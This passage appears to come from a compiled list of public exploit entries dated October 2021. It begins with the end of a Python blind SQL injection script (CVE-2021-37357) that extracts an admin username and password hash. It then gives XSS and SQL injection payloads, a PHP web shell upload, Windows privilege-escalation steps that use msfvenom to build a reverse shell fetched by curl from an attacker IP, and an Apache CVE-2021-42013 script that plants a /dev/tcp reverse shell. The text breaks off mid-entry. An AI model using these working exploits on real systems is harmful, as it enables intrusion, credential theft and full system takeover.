    # extends pass_list with the uppercase letters.
    user_list = pass_list
    user_list += list(string.ascii_uppercase)
    user_list = map(str, user_list)
    user_list = list(user_list)
    session = requests.Session()
    # This URL may change based on the implementation - change as needed
    url = f"{hostname}/online-course-registration/Online/index.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/index.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
    data = {"regno": f"{username}", "password": f"{password}", "submit": ''}
    # The login response is not inspected; a failed login only shows up later
    # as no characters being recovered.
    r = session.post(url, headers=headers, data=data)
    print("Admin username:")
    # This range number is pretty arbitrary, so change it to whatever you feel like
    for i in range(1,33):
        counter = 0
        # `find` is set when no candidate matched at position i, i.e. the end
        # of the value was reached (the name reads inverted).
        find = False
        for j in user_list:
            # This URL may change based on the implementation - change as needed
            url = f"{hostname}/online-course-registration/Online/pincode-verification.php"
            headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
            data = {"pincode": f"' or (select(select (substring(username,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''}
            a = session.post(url, headers=headers, data=data)
            counter += 1
            # Boolean oracle: the enrolment page is rendered only when the
            # injected comparison is true.
            if 'Course Enroll' in a.text:
                sys.stdout.write(j)
                sys.stdout.flush()
                break
            elif counter == len(user_list):
                find = True
                break
        if find:
            break
    print("\n")
    print("Admin password hash:")
    # This range is not arbitrary and will cover md5 hashing - if the hashing implementation is different, change as needed
    for i in range(1,33):
        counter = 0
        find = False
        for j in pass_list:
            url = f"{hostname}/online-course-registration/Online/pincode-verification.php"
            headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
            data = {"pincode": f"' or (select(select (substring(password,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''}
            a = session.post(url, headers=headers, data=data)
            counter += 1
            if 'Course Enroll' in a.text:
                sys.stdout.write(j)
                sys.stdout.flush()
                break
            elif counter == len(pass_list):
                find = True
                break
        if find:
            break
    print("\n\nSuccessfully pwnd :)")


def logo():
    """Print the ASCII-art banner followed by the centred PoC title and credits."""
    art = R'''
 __/\\\\\\\\\\\\\____/\\\\\\\\\\\__/\\\\\_____/\\\__/\\\\_________/\\\__
 _\/\\\/////////\\\_\/////\\\///__\/\\\\\\___\/\\\_\///\\________\/\\\__
 _\/\\\_______\/\\\_____\/\\\_____\/\\\/\\\__\/\\\__/\\/_________\/\\\__
 _\/\\\\\\\\\\\\\/______\/\\\_____\/\\\//\\\_\/\\\_\//___________\/\\\__
 _\/\\\/////////________\/\\\_____\/\\\\//\\\\/\\\__________/\\\\\\\\\__
 _\/\\\_________________\/\\\_____\/\\\_\//\\\/\\\_________/\\\////\\\__
 _\/\\\_________________\/\\\_____\/\\\__\//\\\\\\________\/\\\__\/\\\__
 _\/\\\______________/\\\\\\\\\\\_\/\\\___\//\\\\\________\//\\\\\\\/\\_
 _\///______________\///////////__\///_____\/////__________\///////\//__
'''
    info = 'CVE-2021-37357 PoC'.center(76)
    credits = 'Created by @AffineSecurity and @qhum7sec'.center(76)
    print(f"{art}\n{info}\n{credits}")


def main():
    """Entry point: read hostname, username and password from argv and run exploit().

    NOTE(review): argv is indexed before the length check, so a missing
    argument raises IndexError before the usage line is printed, and the
    usage line does not stop execution when it is printed.
    """
    logo()
    hostname = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    if len(sys.argv) != 4:
        print("Usage: python3 exploit.py http://127.0.0.1:80 username password")
    exploit(hostname, username, password)


if __name__ == '__main__':
    main()
  9. # Exploit Title: Netgear Genie 2.4.64 - Unquoted Service Path # Exploit Author: Mert DAŞ # Version: 2.4.64 # Date: 23.10.2021 # Vendor Homepage: https://www.netgear.com/ # Tested on: Windows 10 C:\Users\Mert>sc qc NETGEARGenieDaemon [SC] QueryServiceConfig SUCCESS SERVICE_NAME: NETGEARGenieDaemon TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\NETGEAR Genie\bin\NETGEARGenieDaemon64.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : NETGEARGenieDaemon DEPENDENCIES : SERVICE_START_NAME : LocalSystem Or: ------------------------- C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  10. # Exploit Title: WordPress Plugin TaxoPress 3.0.7.1 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 23-10-2021 # Exploit Author: Akash Rajendra Patil # Vendor Homepage: # Software Link: https://wordpress.org/plugins/simple-tags/ # Tested on Windows # CVE: CVE-2021-24444 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24444 # Reference: https://wpscan.com/vulnerability/a31321fe-adc6-4480-a220-35aedca52b8b How to reproduce vulnerability: 1. Install Latest WordPress 2. Install and activate TaxoPress Version 3.0.7.1 3. Navigate to Add Table >> add the payload into 'Table Name & Descriptions' and enter the data into the user input field. 4. Enter JavaScript payload which is mentioned below "><img src=x onerror=confirm(docment.domain)> 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.
  11. # Exploit Title: Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE) # Date: 10/23/2021 # Exploit Author: SadKris # Venor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Version: 1.0 # Tested on: XAMPP, Windows 11 # ------------------------------------------------------------------------------------------ # POC # ------------------------------------------------------------------------------------------ # Request sent as base user POST /EngineerShit/teacher_avatar.php HTTP/1.1 Host: localhost.me Content-Length: 510 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost.me Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygBJiBS0af0X03GTp User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost.me/EngineerShit/dasboard_teacher.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi Connection: close ------WebKitFormBoundarygBJiBS0af0X03GTp Content-Disposition: form-data; name="image"; filename="vuln.php" Content-Type: application/octet-stream <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="x"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <?php if($_REQUEST['x']) { system($_REQUEST['x']); } else phpinfo(); ?> ------WebKitFormBoundarygBJiBS0af0X03GTp Content-Disposition: form-data; name="change" # Response HTTP/1.1 200 OK Date: Sun, 24 Oct 2021 01:51:19 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 X-Powered-By: PHP/8.0.12 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 119 Connection: close Content-Type: 
text/html; charset=UTF-8 <script> window.location = "dasboard_teacher.php"; </script> # ------------------------------------------------------------------------------------------ # Request to webshell # ------------------------------------------------------------------------------------------ GET /EngineerShit/admin/uploads/vuln.php?x=echo%20gottem%20bois HTTP/1.1 Host: localhost.me Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi Connection: close # ------------------------------------------------------------------------------------------ # Webshell response # ------------------------------------------------------------------------------------------ HTTP/1.1 200 OK Date: Sun, 24 Oct 2021 01:54:07 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 X-Powered-By: PHP/8.0.12 Content-Length: 154 Connection: close Content-Type: text/html; charset=UTF-8 <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="x"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> gottem bois
  12. # Exploit Title: Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated) # Date: 24/10/2021 # Exploit Author: Nehru Sethuraman # Vendor Homepage: https://ribccs.com/solutions/solution-buildsmart # Version: 21.0817 # Build: 3 # Google Dorks: intitle:buildsmart accounting # Tested on: OS - Windows 2012 R2 or 8.1 & Database - Microsoft SQL Server 2014 Exploit Details: URL: https://example.com/acc/validateLogin.asp?SkipDBSetup=NO&redirectUrl= *HTTP Method:* POST *POST DATA:* VersionNumber=21.0906&activexVersion=3%2C9%2C0%2C0&XLImportCab=1%2C21%2C0%2C0&updaterActivexVersion=4%2C19%2C0%2C0&lang=eng&rptlang=eng&loginID=admin&userPwd=admin&EID=company&eidValue=company&userEmail= Vulnerable Parameter: eidValue SQL Injection Type: Stacked queries Payload: ';WAITFOR DELAY '0:0:3'--
  13. # Exploit Title: OpenClinic GA 5.194.18 - Local Privilege Escalation # Date: 2021-07-24 # Author: Alessandro Salzano # Vendor Homepage: https://sourceforge.net/projects/open-clinic/ # Software Homepage: https://sourceforge.net/projects/open-clinic/ # Software Link: https://sourceforge.net/projects/open-clinic/files/latest/download # Version: 5.194.18 # Tested on: Microsoft Windows 10 Enterprise x64 Open Source Integrated Hospital Information Management System. OpenClinic GA is an open source integrated hospital information management system covering management of administrative, financial, clinical, lab, x-ray, pharmacy, meals distribution and other data. Extensive statistical and reporting capabilities. Vendor: OpenClinic GA. Affected version: > 5.194.18 # Details # By default the Authenticated Users group has modify permission on the openclinic folders/files, as shown below. # A low privilege account is able to rename the mysqld.exe or tomcat8.exe files located in the bin folders and replace # them with a malicious file that would connect back to an attacking computer, giving system level privileges # (nt authority\system) because the service runs as Local System. # While a low privilege user is unable to restart the service through the application, a restart of the # computer triggers the execution of the malicious file. The application also has unquoted service path issues. (1) Impacted services. 
Any low privileged user can elevate their privileges abusing MariaDB service: C:\projects\openclinic\mariadb\bin\mysqld.exe Details: SERVICE_NAME: OpenClinicHttp TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : c:\projects\openclinic\tomcat8\bin\tomcat8.exe //RS//OpenClinicHttp LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OpenClinicHttp DEPENDENCIES : Tcpip : Afd SERVICE_START_NAME : NT Authority\LocalServic -------- SERVICE_NAME: OpenClinicMySQL TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : c:\projects\openclinic\mariadb\bin\mysqld.exe --defaults-file=c:/projects/openclinic/mariadb/my.ini OpenClinicMySQL LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OpenClinicMySQL DEPENDENCIES : SERVICE_START_NAME : LocalSystem (2) Folder permissions. Insecure folders permissions issue: icacls C:\projects\openclinic C:\projects\openclinic Everyone:(I)(OI)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) # Proof of Concept 1. Generate malicious .exe on attacking machine msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe 2. Setup listener and ensure apache is running on attacking machine nc -lvp 4242 service apache2 start 3. Download malicious .exe on victim machine type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\projects\openclinic\mariadb\bin\mysqld_evil.exe" 4. Overwrite file and copy malicious .exe. Renename C:\projects\openclinic\mariadb\bin\mysqld.exe > mysqld.bak Rename downloaded 'mysqld_evil.exe' file in mysqld.exe 5. Restart victim machine 6. Reverse Shell on attacking machine opens C:\Windows\system32>whoami whoami nt authority\system
  14. # Exploit Title: Gestionale Open 11.00.00 - Local Privilege Escalation # Date: 2021-07-19 # Author: Alessandro 'mindsflee' Salzano # Vendor Homepage: https://www.gestionaleopen.org/ # Software Homepage: https://www.gestionaleopen.org/ # Software Link: https://www.gestionaleopen.org/wp-content/uploads/downloads/ESEGUIBILI_STANDARD/setup_go_1101.exe # Version: 11.00.00 # Tested on: Microsoft Windows 10 Enterprise x64 With GO - Gestionale Open - it is possible to manage, check and print every aspect of accounting according to the provisions of Italian taxation. Vendor: Gestionale Open srl. Affected version: > 11.00.00 # Details # By default the Authenticated Users group has modify permission on the Gestionale Open folders/files, as shown below. # A low privilege account is able to rename the mysqld.exe file located in the bin folder and replace # it with a malicious file that would connect back to an attacking computer, giving system level privileges # (nt authority\system) because the service runs as Local System. # While a low privilege user is unable to restart the service through the application, a restart of the # computer triggers the execution of the malicious file. The application also has unquoted service path issues. (1) Impacted services. Any low privileged user can elevate their privileges abusing MariaDB service: C:\Gestionale_Open\MySQL57\bin\mysqld.exe Details: SERVICE_NAME: DB_GO TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Gestionale_Open\MySQL57\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL57\my.ini DB_GO LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DB_GO DEPENDENCIES : SERVICE_START_NAME : LocalSystem (2) Folder permissions. Insecure folders permissions issue: C:\Gestionale_Open Everyone:(I)(OI)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) # Proof of Concept 1. 
Generate malicious .exe on attacking machine msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe 2. Setup listener and ensure apache is running on attacking machine nc -lvp 4242 service apache2 start 3. Download malicious .exe on victim machine type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Gestionale_Open\MySQL57\bin\mysqld_evil.exe" 4. Overwrite file and copy malicious .exe. Renename C:\Gestionale_Open\MySQL57\bin\mysqld.exe > mysqld.bak Rename downloaded 'mysqld_evil.exe' file in mysqld.exe 5. Restart victim machine 6. Reverse Shell on attacking machine opens C:\Windows\system32>whoami whoami nt authority\system
  15. # Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2) # Credits: Ash Daulton & cPanel Security Team # Date: 24/07/2021 # Exploit Author: TheLastVvV.com # Vendor Homepage: https://apache.org/ # Version: Apache 2.4.50 with CGI enable # Tested on : Debian 5.10.28 # CVE : CVE-2021-42013 #!/bin/bash echo 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI' if [ $# -eq 0 ] then echo "try: ./$0 http://ip:port LHOST LPORT" exit 1 fi curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh" && curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh" #usage chmod -x CVE-2021-42013.sh #./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT
  16. # Exploit Title: Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated) # Date: 24.10.2021 # Exploit Author: blockomat2100 # Vendor Homepage: https://www.balbooa.com/ # Version: 2.0.6 # Tested on: Docker An example request to trigger the SQL-Injection: POST /index.php?option=com_baforms HTTP/1.1 Host: localhost Content-Length: 862 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTAak6w3vHUykgInT Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: 7b1c9321dbfaa3e34d2c66e9b23b9d21=016d065924684a506c09304ba2a13035 Connection: close ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="1" {"1":{"submission_id":0,"form_id":1,"field_id":1,"name":"test.png","filename":"test.png","date":"2021-09-28-17-19-51","id":"SQLI"}} ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="form-id" 1 ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="task" form.message ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="submit-btn" 2 ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="page-title" Home ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="page-url" http://localhost/ ------WebKitFormBoundaryTAak6w3vHUykgInT Content-Disposition: form-data; name="page-id" 0 ------WebKitFormBoundaryTAak6w3vHUykgInT--
  17. # Exploit Title: Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) # Exploit Author: Alon Leviev # Date: 22-10-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip # Version: 1.0 # Tested on: Kali Linux # CVE : cve-2021-42664 # Vulnerable page: add_quiz.php # Vulnerable Parameters: "quiz_title", "description" Technical description: A stored XSS vulnerability exists in the Engineers Online Portal. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. Steps to exploit: 1) Navigate to http://localhost/nia_munoz_monitoring_system/add_quiz.php 2) Insert your payload in the "quiz_title" parameter or the "description" parameter 3) Click save Proof of concept (Poc): The following payload will allow you to run the javascript - <script>alert("This is an XSS Give me your cookies")</script> --- POST /nia_munoz_monitoring_system/add_quiz.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 91 Origin: http://localhost Connection: close Referer: http://localhost/nia_munoz_monitoring_system/add_quiz.php Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 Upgrade-Insecure-Requests: 1 quiz_title=%3Cscript%3Ealert%28%22This+is+an+XSS%22%29%3C%2Fscript%3E&description=xss&save= OR POST /nia_munoz_monitoring_system/edit_quiz.php?id=6 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 101 Origin: http://localhost Connection: close Referer: http://localhost/nia_munoz_monitoring_system/edit_quiz.php?id=6 Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 Upgrade-Insecure-Requests: 1 quiz_id=6&quiz_title=xss&description=%3Cscript%3Ealert%28%22This+is+an+xss%22%29%3C%2Fscript%3E&save= ---
  18. # Exploit Title: Online Event Booking and Reservation System 1.0 - 'reason' Stored Cross-Site Scripting (XSS) # Exploit Author: Alon Leviev # Date: 22-10-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event-management.zip # Version: 1.0 # Tested on: Linux # Vulnerable page: HOLY # Vulnerable Parameters: "reason" Technical description: A stored XSS vulnerability exists in the Event management software. An attacker can leverage this vulnerability to run JavaScript in the browsers of the application's users, which can lead to cookie theft, defacement and more. Steps to exploit: 1) Navigate to http://localhost/event-management/views/?v=HOLY 2) Insert your payload in the "reason" parameter 3) Click "Add holiday" Proof of concept (PoC): The following payload will allow you to run the JavaScript - <script>alert("This is an XSS")</script> --- POST /event-management/api/process.php?cmd=holiday HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 81 Origin: http://localhost Connection: close Referer: http://localhost/event-management/views/?v=HOLY&msg=Holiday+record+successfully+deleted. Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 Upgrade-Insecure-Requests: 1 date=2021-12-21&reason=%3Cscript%3Ealert%28%22This+is+an+xss%22%29%3C%2Fscript%3E ---
  19. # Exploit Title: Engineers Online Portal 1.0 - 'id' SQL Injection # Exploit Author: Alon Leviev # Date: 22-10-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip # Version: 1.0 # Tested on: Kali Linux # Vulnerable page: quiz_question.php # Vulnerable Parameter: "id" Technical description: An SQL Injection vulnerability exists in the Engineers Online Portal. An attacker can leverage the vulnerable "id" parameter in the "quiz_question.php" web page in order to manipulate the sql query performed. As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server. Steps to exploit: 1) Navigate to http://localhost/nia_munoz_monitoring_system/quiz_question.php 2) Insert your payload in the id parameter Proof of concept (Poc): The following payload will allow you to extract the MySql server version running on the web server - ' union select NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL;-- - --- GET /nia_munoz_monitoring_system/quiz_question.php?id=3%27%20union%20select%20NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL--%20- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 Upgrade-Insecure-Requests: 1 ---
  20. # Exploit Title: WordPress Plugin Media-Tags 3.2.0.2 - Stored Cross-Site Scripting (XSS) # Date: 25-10-2021 # Exploit Author: Akash Rajendra Patil # Vendor Homepage: https://wordpress.org/plugins/media-tags/ # Software Link: www.codehooligans.com/projects/wordpress/media-tags/ # Version: 3.2.0.2 # Tested on Windows *How to reproduce the vulnerability:* 1. Install the latest WordPress 2. Install and activate Media-Tags <= 3.2.0.2 3. Navigate to Add Table >> add the payload into 'Media Tag Label Fields' and enter the data into the user input field. 4. Enter the JavaScript payload mentioned below "><img src=x onerror=confirm(docment.domain)> 5. You will observe that the payload is stored in the database; when the same functionality is triggered again, the JavaScript payload executes and a pop-up appears.
  21. # Exploit Title: Engineers Online Portal 1.0 - 'multiple' Authentication Bypass # Exploit Author: Alon Leviev # Date: 22-10-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip # Version: 1.0 # Tested on: Kali Linux # Vulnerable page: login.php # VUlnerable parameters: "username", "password" Technical description: An SQL Injection vulnerability exists in the Engineers Online Portal login form which can allow an attacker to bypass authentication. Steps to exploit: 1) Navigate to http://localhost/nia_munoz_monitoring_system/login.php 2) Insert your payload in the user or password field 3) Click login Proof of concept (Poc): The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form - ' OR '1'='1';-- - --- POST /nia_munoz_monitoring_system/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 41 Origin: http://localhost Connection: close Referer: http://localhost/nia_munoz_monitoring_system/ Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 username='+or+'1'%3D'1'%3B--+-&password=sqli OR POST /nia_munoz_monitoring_system/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 44 Origin: http://localhost Connection: close Referer: http://localhost/nia_munoz_monitoring_system/ Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9 
username=sqli&password='+or+'1'%3D'1'%3B--+- ---
  22. # Exploit Title: WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS) # Date: 25-10-2021 # Exploit Author: Akash Rajendra Patil # Vendor Homepage: https://wordpress.org/plugins/ninja-tables/ # Software Link: https://wpmanageninja.com/downloads/ninja-tables-pro-add-on/ # Version: 4.1.7 # Tested on Windows *How to reproduce the vulnerability:* 1. Install the latest WordPress 2. Install and activate Ninja Tables <= 4.1.7 3. Enter the JavaScript payload mentioned below "><img src=x onerror=confirm(docment.domain)> in the 'Column Name & Add Data' field and enter the data into the user input field. Then navigate to Table Design 5. You will observe that the payload is stored in the database; when the same functionality is triggered again, the JavaScript payload executes and a pop-up appears.
  23. # Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) (4) # Author: P4p4_M4n3 # Vendor Homepage: http://codiad.com/ # Software Links : https://github.com/Codiad/Codiad/releases # Type: WebApp ###################-------------------------##########################------------################### # Proof of Concept: # # # # 1- login on codiad # # # # 2- go to themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/" directory # # # # 3- right click and select upload file # # # # 4- click on "Drag file or Click Here To Upload" and select your reverse_shell file # # # ###################-------------------------#########################-------------################### after that your file should be in INF directory, right click on your file and select delete, and you will see the full path of your file run it in your terminal with "curl" and boom!! /var/www/html/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php 1 - # nc -lnvp 1234 2 - curl http://target_ip/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php -u "admin:P@ssw0rd"
  24. # Exploit Title: i3 International Annexxus Cameras Ax-n 5.2.0 - Application Logic Flaw # Date: 27.10.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.i3international.com i3 International Annexxus Cameras Ax-n 5.2.0 Application Logic Flaw Vendor: i3 International Inc. Product web page: https://www.i3international.com Affected version: V5.2.0 build 150317 (Ax46) V5.0.9 build 151106 (Ax68) V5.0.9 build 150615 (Ax78) Summary: The Annexxus camera 6MP provides 4 simultaneous, independently controlled digital pan-tilt-zoom (ePTZ) video streams, which may be recorded or viewed live, as well as a built-in microphone and speaker allowing two-way communication. Desc: The application doesn't allow creation of more than one administrator account on the system. This also applies to deletion of the administrative account. The logic behind this restriction can be bypassed by parameter manipulation using the PUT and DELETE verbs, combined with improper server-side validation. Once a normal account with 'viewer' or 'operator' permissions has been added by the default admin user 'i3admin', a PUT request can be issued calling the 'UserPermission' endpoint with the ID of the created account and setting it to 